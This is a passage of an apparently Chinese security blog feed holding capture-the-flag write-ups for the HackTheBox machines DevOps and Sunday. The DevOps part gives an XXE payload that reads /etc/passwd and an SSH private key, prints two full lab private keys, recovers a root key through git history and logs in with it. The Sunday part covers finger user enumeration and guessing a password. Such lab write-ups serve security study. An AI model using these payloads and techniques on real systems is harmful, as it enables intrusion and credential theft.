/post/hackbox/devops/image/image_xALVzT1qAH_hu8632013709fc93e0c6c1409b8e547726_108882_436dcb9d4681cd8ab0dc4a376e5488a6.webp 400w,
/post/hackbox/devops/image/image_xALVzT1qAH_hu8632013709fc93e0c6c1409b8e547726_108882_710ecbaf93398a740c9dc3637493eff2.webp 760w,
/post/hackbox/devops/image/image_xALVzT1qAH_hu8632013709fc93e0c6c1409b8e547726_108882_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_xALVzT1qAH_hu8632013709fc93e0c6c1409b8e547726_108882_436dcb9d4681cd8ab0dc4a376e5488a6.webp"
width="1059"
height="554"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>尝试利用&lt;code>xxe&lt;/code>读取任意文件&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="line">&lt;span class="cl">&lt;span class="cp">&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="cp">&amp;lt;!DOCTYPE foo [
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="cp">
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="cp"> &amp;lt;!ENTITY xxe SYSTEM &amp;#34;file:///etc/passwd&amp;#34; &amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">]&amp;gt;
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;data&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;Author&amp;gt;&lt;/span>&lt;span class="ni">&amp;amp;xxe;&lt;/span>&lt;span class="nt">&amp;lt;/Author&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;Subject&amp;gt;&lt;/span>test&lt;span class="nt">&amp;lt;/Subject&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;Content&amp;gt;&lt;/span>hello&lt;span class="nt">&amp;lt;/Content&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;/data&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>读到&lt;code> /home&lt;/code> 目录下存在&lt;code>osboxes、git、roosa、blogfeed&lt;/code> 用户，git和roosa有、&lt;code>/bin/bash&lt;/code>权限&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_LGqV3GjtsP_hua38fad896b026be767763ded8153112f_154397_373638245532a098c3b0076db5f7e57b.webp 400w,
/post/hackbox/devops/image/image_LGqV3GjtsP_hua38fad896b026be767763ded8153112f_154397_34d9242071c869696240b41d94bf3be3.webp 760w,
/post/hackbox/devops/image/image_LGqV3GjtsP_hua38fad896b026be767763ded8153112f_154397_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_LGqV3GjtsP_hua38fad896b026be767763ded8153112f_154397_373638245532a098c3b0076db5f7e57b.webp"
width="1254"
height="574"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>结合22端口，可以通过读取用户ssh证书实现免密登录&lt;/p>
&lt;p>/home/roosa/.ssh/id_rsa&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">-----BEGIN RSA PRIVATE KEY-----
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">MIIEogIBAAKCAQEAuMMt4qh/ib86xJBLmzePl6/5ZRNJkUj/Xuv1+d6nccTffb/7
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">9sIXha2h4a4fp18F53jdx3PqEO7HAXlszAlBvGdg63i+LxWmu8p5BrTmEPl+cQ4J
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">R/R+exNggHuqsp8rrcHq96lbXtORy8SOliUjfspPsWfY7JbktKyaQK0JunR25jVk
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">v5YhGVeyaTNmSNPTlpZCVGVAp1RotWdc/0ex7qznq45wLb2tZFGE0xmYTeXgoaX4
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">9QIQQnoi6DP3+7ErQSd6QGTq5mCvszpnTUsmwFj5JRdhjGszt0zBGllsVn99O90K
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">m3pN8SN1yWCTal6FLUiuxXg99YSV0tEl0rfSUwIDAQABAoIBAB6rj69jZyB3lQrS
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">JSrT80sr1At6QykR5ApewwtCcatKEgtu1iWlHIB9TTUIUYrYFEPTZYVZcY50BKbz
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ACNyme3rf0Q3W+K3BmF//80kNFi3Ac1EljfSlzhZBBjv7msOTxLd8OJBw8AfAMHB
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">lCXKbnT6onYBlhnYBokTadu4nbfMm0ddJo5y32NaskFTAdAG882WkK5V5iszsE/3
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">koarlmzP1M0KPyaVrID3vgAvuJo3P6ynOoXlmn/oncZZdtwmhEjC23XALItW+lh7
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">e7ZKcMoH4J2W8OsbRXVF9YLSZz/AgHFI5XWp7V0Fyh2hp7UMe4dY0e1WKQn0wRKe
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">8oa9wQkCgYEA2tpna+vm3yIwu4ee12x2GhU7lsw58dcXXfn3pGLW7vQr5XcSVoqJ
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Lk6u5T6VpcQTBCuM9+voiWDX0FUWE97obj8TYwL2vu2wk3ZJn00U83YQ4p9+tno6
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">NipeFs5ggIBQDU1k1nrBY10TpuyDgZL+2vxpfz1SdaHgHFgZDWjaEtUCgYEA2B93
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">hNNeXCaXAeS6NJHAxeTKOhapqRoJbNHjZAhsmCRENk6UhXyYCGxX40g7i7T15vt0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ESzdXu+uAG0/s3VNEdU5VggLu3RzpD1ePt03eBvimsgnciWlw6xuZlG3UEQJW8sk
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">A3+XsGjUpXv9TMt8XBf3muESRBmeVQUnp7RiVIcCgYBo9BZm7hGg7l+af1aQjuYw
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">agBSuAwNy43cNpUpU3Ep1RT8DVdRA0z4VSmQrKvNfDN2a4BGIO86eqPkt/lHfD3R
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">KRSeBfzY4VotzatO5wNmIjfExqJY1lL2SOkoXL5wwZgiWPxD00jM4wUapxAF4r2v
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">vR7Gs1zJJuE4FpOlF6SFJQKBgHbHBHa5e9iFVOSzgiq2GA4qqYG3RtMq/hcSWzh0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">8MnE1MBL+5BJY3ztnnfJEQC9GZAyjh2KXLd6XlTZtfK4+vxcBUDk9x206IFRQOSn
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">y351RNrwOc2gJzQdJieRrX+thL8wK8DIdON9GbFBLXrxMo2ilnBGVjWbJstvI9Yl
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">aw0tAoGAGkndihmC5PayKdR1PYhdlVIsfEaDIgemK3/XxvnaUUcuWi2RhX3AlowG
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">xgQt1LOdApYoosALYta1JPen+65V02Fy5NgtoijLzvmNSz+rpRHGK6E8u3ihmmaq
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">82W3d4vCUPkKnrgG8F7s3GL6cqWcbZBd0j9u88fUWfPxfRaQU3s&lt;/span>&lt;span class="o">=&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">-----END RSA PRIVATE KEY-----
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录roosa&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">mv id_rsa roosa_id_rsa
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">600&lt;/span> roosa_id_rsa
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ssh -i roosa_id_rsa roosa@10.10.10.91
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_Lp9bz3pRim_huf84b6c528d1ccdd871caddd752d4c4f2_105593_98edf026acce8cd435283faf34ac0fd0.webp 400w,
/post/hackbox/devops/image/image_Lp9bz3pRim_huf84b6c528d1ccdd871caddd752d4c4f2_105593_1d4664b4e28866d0d9e4916fe74cc972.webp 760w,
/post/hackbox/devops/image/image_Lp9bz3pRim_huf84b6c528d1ccdd871caddd752d4c4f2_105593_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_Lp9bz3pRim_huf84b6c528d1ccdd871caddd752d4c4f2_105593_98edf026acce8cd435283faf34ac0fd0.webp"
width="862"
height="410"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权&lt;/p>
&lt;p>查看&lt;code> /home/roosa/.bash_history&lt;/code>&lt;/p>
&lt;p>这里截取了关键的历史命令记录&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">mkdir resources
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">cd&lt;/span> resources
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mkdir integration
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mkdir integration/auth_credentials.key
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">nano integration/auth_credentials.key/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">chmod go-rwx authcredentials.key
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -atlr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">cd&lt;/span> ..
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">chmod -R o-rwx .
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls resources/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls resources/integration/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr resources/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr resources/integration/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">rm -Rf resources/integration/auth_credentials.key
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mv resources/authcredentials.key resources/integration/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git add resources/integration/authcredentials.key &lt;span class="c1">#添加了一个ssh密钥&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git commit -m &lt;span class="s1">&amp;#39;add key for feed integration from tnerprise backend&amp;#39;&lt;/span> &lt;span class="c1">#部署到仓库&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr resources/integration/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git push &lt;span class="c1">#推送&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ssh-keygen &lt;span class="c1">#重新生成一个ssh密钥&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ös -altr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls .altr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">cat kak
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">cp kak resources/integration/authcredentials.key &lt;span class="c1">#覆盖之前的密钥&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git add resources/integration/authcredentials.key &lt;span class="c1">#重新添加ssh密钥&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git commit -m &lt;span class="s1">&amp;#39;reverted accidental commit with proper key&amp;#39;&lt;/span> &lt;span class="c1">#部署到仓库&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git push &lt;span class="c1">#推送&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">rm kak &lt;span class="c1">#删除密钥&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">rm kak.pub
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git log
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ls -altr
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>从备注的说法是push了一个错误的key，然后重新提交了。&lt;/p>
&lt;p>猜测开发者刚开始push的key可能是高权限(root)的key&lt;/p>
&lt;p>通过git回退到之前的版本，就能获取到root的登录密钥&lt;/p>
&lt;p>查看git 提交日志&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nb">cd&lt;/span> work/blogfeed
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git log
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_6qA2yd8s9o_huba4775411332af32568e6895aef0f80b_132659_49c8aff8df9db45f314ade9ebad51336.webp 400w,
/post/hackbox/devops/image/image_6qA2yd8s9o_huba4775411332af32568e6895aef0f80b_132659_fdf522398c9fe35574425f838b62ac4f.webp 760w,
/post/hackbox/devops/image/image_6qA2yd8s9o_huba4775411332af32568e6895aef0f80b_132659_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_6qA2yd8s9o_huba4775411332af32568e6895aef0f80b_132659_49c8aff8df9db45f314ade9ebad51336.webp"
width="805"
height="706"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>回退到第一次添加key的版本&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">roosa@gitter:~/work/blogfeed$ git reset --hard d387abf63e05c9628a59195cec9311751bdb283f
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">HEAD is now at d387abf add key &lt;span class="k">for&lt;/span> feed integration from tnerprise backend
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">roosa@gitter:~/work/blogfeed$ cat resources/integration/authcredentials.key
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>authcredentials.key （root）&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">-----BEGIN RSA PRIVATE KEY-----
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">vr+5Ui0nD+YBKyYuiN+4CB8jSQvwOG+LlA3IGAzVf56J0WP9FILH/NwYW2iovTRK
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">nz1y2vdO3ug94XX8y0bbMR9Mtpj292wNrxmUSQ5glioqrSrwFfevWt/rEgIVmrb+
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">CCjeERnxMwaZNFP0SYoiC5HweyXD6ZLgFO4uOVuImILGJyyQJ8u5BI2mc/SHSE0c
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">F9DmYwbVqRcurk3yAS+jEbXgObupXkDHgIoMCwIDAQABAoIBAFaUuHIKVT+UK2oH
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">uzjPbIdyEkDc3PAYP+E/jdqy2eFdofJKDocOf9BDhxKlmO968PxoBe25jjjt0AAL
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">gCfN5I+xZGH19V4HPMCrK6PzskYII3/i4K7FEHMn8ZgDZpj7U69Iz2l9xa4lyzeD
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">k2X0256DbRv/ZYaWPhX+fGw3dCMWkRs6MoBNVS4wAMmOCiFl3hzHlgIemLMm6QSy
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">NnTtLPXwkS84KMfZGbnolAiZbHAqhe5cRfV2CVw2U8GaIS3fqV3ioD0qqQjIIPNM
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">HSRik2J/7Y7OuBRQN+auzFKV7QeLFeROJsLhLaPhstY5QQReQr9oIuTAs9c+oCLa
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">2fXe3kkCgYEA367aoOTisun9UJ7ObgNZTDPeaXajhWrZbxlSsOeOBp5CK/oLc0RB
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">GLEKU6HtUuKFvlXdJ22S4/rQb0RiDcU/wOiDzmlCTQJrnLgqzBwNXp+MH6Av9WHG
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">jwrjv/loHYF0vXUHHRVJmcXzsftZk2aJ29TXud5UMqHovyieb3mZ0pcCgYEAxR41
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">IMq2dif3laGnQuYrjQVNFfvwDt1JD1mKNG8OppwTgcPbFO+R3+MqL7lvAhHjWKMw
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">+XjmkQEZbnmwf1fKuIHW9uD9KxxHqgucNv9ySuMtVPp/QYtjn/ltojR16JNTKqiW
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">7vSqlsZnT9jR2syvuhhVz4Ei9yA/VYZG2uiCpK0CgYA/UOhz+LYu/MsGoh0+yNXj
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Gx+O7NU2s9sedqWQi8sJFo0Wk63gD+b5TUvmBoT+HD7NdNKoEX0t6VZM2KeEzFvS
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">iD6fE+5/i/rYHs2Gfz5NlY39ecN5ixbAcM2tDrUo/PcFlfXQhrERxRXJQKPHdJP7
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">VRFHfKaKuof+bEoEtgATuwKBgC3Ce3bnWEBJuvIjmt6u7EFKj8CgwfPRbxp/INRX
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">S8Flzil7vCo6C1U8ORjnJVwHpw12pPHlHTFgXfUFjvGhAdCfY7XgOSV+5SwWkec6
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">md/EqUtm84/VugTzNH5JS234dYAbrx498jQaTvV8UgtHJSxAZftL8UAJXmqOR3ie
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">LWXpAoGADMbq4aFzQuUPldxr3thx0KRz9LJUJfrpADAUbxo8zVvbwt4gM2vsXwcz
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE&lt;/span>&lt;span class="o">=&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">-----END RSA PRIVATE KEY-----
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录root&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">600&lt;/span> resources/integration/authcredentials.key
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ssh -i resources/integration/authcredentials.key root@127.0.0.1
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_QnNX9oUx2P_hu5e47ce35c10923472974eab29cf56e27_101603_3382df9658c80a4edb8e0f603dfb8533.webp 400w,
/post/hackbox/devops/image/image_QnNX9oUx2P_hu5e47ce35c10923472974eab29cf56e27_101603_0ae290d76ffec4185f0102205c8c6679.webp 760w,
/post/hackbox/devops/image/image_QnNX9oUx2P_hu5e47ce35c10923472974eab29cf56e27_101603_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_QnNX9oUx2P_hu5e47ce35c10923472974eab29cf56e27_101603_3382df9658c80a4edb8e0f603dfb8533.webp"
width="1212"
height="379"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Sunday</title><link>https://docs.kaiasec.tk/post/hackbox/sunday/</link><pubDate>Fri, 10 Jun 2022 18:16:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/sunday/</guid><description>&lt;h4 id="nmap">nmap&lt;/h4>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -r -p- -vv -sV 10.10.10.76
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_vYgpvcDB8s_hu9d3acf8b249ea35ac480015ab0226c70_129439_9d0c1bee85e3bceed3fa3dfd0c1c6406.webp 400w,
/post/hackbox/sunday/image/image_vYgpvcDB8s_hu9d3acf8b249ea35ac480015ab0226c70_129439_027088c855cbf7673dcf6def90b3d59b.webp 760w,
/post/hackbox/sunday/image/image_vYgpvcDB8s_hu9d3acf8b249ea35ac480015ab0226c70_129439_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_vYgpvcDB8s_hu9d3acf8b249ea35ac480015ab0226c70_129439_9d0c1bee85e3bceed3fa3dfd0c1c6406.webp"
width="880"
height="247"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>79端口 &lt;code>finger&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_7BqrrpRcaH_hua8288d9b8b85858802c41d3261abe683_22367_90da5e143cb904ed8ca00ca0bf1269bd.webp 400w,
/post/hackbox/sunday/image/image_7BqrrpRcaH_hua8288d9b8b85858802c41d3261abe683_22367_9ca47b0203c046889e95fe051f7d798a.webp 760w,
/post/hackbox/sunday/image/image_7BqrrpRcaH_hua8288d9b8b85858802c41d3261abe683_22367_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_7BqrrpRcaH_hua8288d9b8b85858802c41d3261abe683_22367_90da5e143cb904ed8ca00ca0bf1269bd.webp"
width="399"
height="92"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;a href="https://baike.baidu.com/item/finger%E6%9C%8D%E5%8A%A1/10976284?fr=aladdin" target="_blank" rel="noopener">https://baike.baidu.com/item/finger%E6%9C%8D%E5%8A%A1/10976284?fr=aladdin&lt;/a>&lt;/p>
&lt;p>公开的漏洞信息中能够找到&lt;code>finger&lt;/code>漏洞能够枚举ssh的用户名，因为又扫到了&lt;code>22022&lt;/code>是&lt;code>ssh&lt;/code>服务，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_SNDWhz2fK5_huff8c01cdbaceecf6ed862e042372b781_20112_f26e68cb7e3f002e7ede418a77357fd4.webp 400w,
/post/hackbox/sunday/image/image_SNDWhz2fK5_huff8c01cdbaceecf6ed862e042372b781_20112_50aea31e229708f1dc934cb1f7173dd7.webp 760w,
/post/hackbox/sunday/image/image_SNDWhz2fK5_huff8c01cdbaceecf6ed862e042372b781_20112_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_SNDWhz2fK5_huff8c01cdbaceecf6ed862e042372b781_20112_f26e68cb7e3f002e7ede418a77357fd4.webp"
width="620"
height="74"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>找到一个枚举脚本&lt;/p>
&lt;p>&lt;a href="https://github.com/pentestmonkey/finger-user-enum" target="_blank" rel="noopener">https://github.com/pentestmonkey/finger-user-enum&lt;/a>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">./finger-user-enum.pl -m &lt;span class="m">50&lt;/span> -U /usr/share/dnsrecon/subdomains-top1mil-20000.txt -t 10.10.10.76&lt;span class="p">|&lt;/span>less -S
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>这里注意到有两个用户，sunny和sammy记录了登录的IP地址，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_LoTlbLvRov_huee2afd7ed8bd993257c0dd856383d4cb_141206_c28b58c85bc070694a83038dd3434aca.webp 400w,
/post/hackbox/sunday/image/image_LoTlbLvRov_huee2afd7ed8bd993257c0dd856383d4cb_141206_856f36c7c8c027da6e2ae186b40628fb.webp 760w,
/post/hackbox/sunday/image/image_LoTlbLvRov_huee2afd7ed8bd993257c0dd856383d4cb_141206_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_LoTlbLvRov_huee2afd7ed8bd993257c0dd856383d4cb_141206_c28b58c85bc070694a83038dd3434aca.webp"
width="1358"
height="857"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>经过尝试发现密码是题目名字，老套路了&lt;/p>
&lt;p>&lt;code>sunny/sunday&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_p1baulwPVk_huee92e5212d8ff67c3dbf3462a5370c91_49130_bcc9dc42a8ff16b48fbd840cfe0ef580.webp 400w,
/post/hackbox/sunday/image/image_p1baulwPVk_huee92e5212d8ff67c3dbf3462a5370c91_49130_fccd7436e79715df9be03ef13484942d.webp 760w,
